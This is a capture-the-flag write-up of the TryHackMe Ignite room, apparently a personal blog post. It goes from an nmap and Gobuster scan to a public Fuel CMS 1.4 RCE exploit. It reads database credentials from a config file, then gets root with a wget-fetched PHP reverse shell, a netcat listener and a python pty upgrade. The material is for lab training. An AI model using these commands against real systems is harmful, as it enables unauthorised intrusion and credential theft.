TryHackMe | Ignite Writeup
TryHackMe’s Ignite room is an easy room involving a vulnerable CMS service and a reverse shell to get from an initial nmap scan to root access. This writeup will go through every step required to complete the room.
Task 1: Root it!
1. User.txt
Let’s start the target machine by clicking the green “Start Machine button at the top of the task. We then need to connect to the TryHackMe network. I’m using my own Kali virtual machine so I’ll connect over OpenVPN.
Now that we have everything set up, we can start breaking into the machine. Let’s start with a basic nmap scan. We want to list the services and we want it to be very verbose so we’ll use the sV and vv flags. The full command will look like the following.
nmap -sV -vv 10.10.175.67We get a single HTTP service as a result.
Let’s navigate to this website and see what’s on there.
We’re met with the default page for Fuel CMS. While we read what’s here let’s start a Gobuster scan in the background to see if there are any hidden directories. We’ll use the common.txt wordlist so the full command will look like the following.
gobuster dir -u http://10.10.175.67 -w /usr/share/wordlists/dirb/common.txtWhich gives us a small list of directories.
While the scan was going, I found two interesting things listed on the Fuel CMS website. The first lists a possible location for usernames and passwords.
The second lists the default login for the admin panel on the site.
Let’s see if we can access the admin panel using these credentials.
I was able to access the admin panel but nothing would load. Hopefully nothing here is necessary because I can’t access any of the pages. I looked at some of the Gobuster directories but they also didn’t contain anything interesting. The default page listed the version as 1.4, let’s see if there are any vulnerabilities for this version. We can use Exploit-DB to check for this.
There are three RCEs that we can use on this version of the CMS.
Let’s download the third one and see if we can utilize it against the service.
It worked! We have the listed file location from the default page of the website, let’s see if we can use “cat” to display the contents of this file. We’ll send the following command to the machine.
cat fuel/application/config/database.phpFrom this we get a big piece of information, the root credentials.
We know how to login as root, but we have no way of doing so. We need to try to get a shell in the system so we can change our user to root. Before that though, let’s see if we can submit the user flag using this command interface.
Nice! We got the user flag, let’s now move to get into the system.
2. Root.txt
We need a way to get a shell in the system, “sudo -l” doesn’t return anything to us. In my last writeup, I used wget to exploit the machine, maybe on this machine we can use it to move a shell from our system onto the target.
We’ll use PentestMonkey’s reverse php shell for our shell. We’ll start by downloading the shell and replacing the IP and port with our own.
Next we need to set up an HTTP server on our machine for the target to get the shell from. We can do this by using python, we’ll use the following command.
python3 -m http.server 80This then will tell us that we’re serving HTTP on port 80.
All of our stuff is set up, let’s input the following command on the target machine to download the shell.
wget http://<our_IP>/shell.phpWe’ll see the following in our HTTP server window confirming that it was downloaded.
Now we can start a netcat listener on our machine to catch the shell when we activate it. We can use the following command to start that.
rlwrap nc -lvnp 4444If you need an explainer on the flags specified in the listener, click here.
We are ready to catch the shell. Let’s activate the shell by navigating to the file on the website.
The website hangs when we navigate to the shell, let’s check our listener to see if we have a shell.
We caught the shell! We can’t get to root yet, though, because our shell is not interactive. Let’s upgrade our shell using python. We can run the following command to upgrade.
python -c 'import pty; pty.spawn("/bin/bash")'
Now that we can interact with the shell, let’s use “su root” with the password we found earlier to get root on the machine.
We have root! Let’s grab the flag now and finish up the room!
We’ve completed the room! We went from an nmap scan to root access using a vulnerable CMS, a reverse shell, and shell upgrades. I hope this writeup could be helpful in completing the room! If you are still struggling please leave a comment or message me on Twitter and I will try my best to assist!
Lessons Learned:
- Python can be used to host a HTTP server
- Outdated applications are vulnerable
Things I struggled with:
I had trouble using the commands in the exploit. I was trying to use commands one at a time to change directories but I had to input them all at once for it to work correctly. Other than that I think I got everything else pretty quickly and understood what to do.
Conclusion:
This room is okay. I liked having to use the exploit but being able to get root just by reading the default page wasn’t great in my opinion. Most of the other things needed to root the machine are common in other rooms so there wasn’t really anything that I hadn’t seen before. I don’t think this room would be very difficult for someone who has completed one or two other rooms.
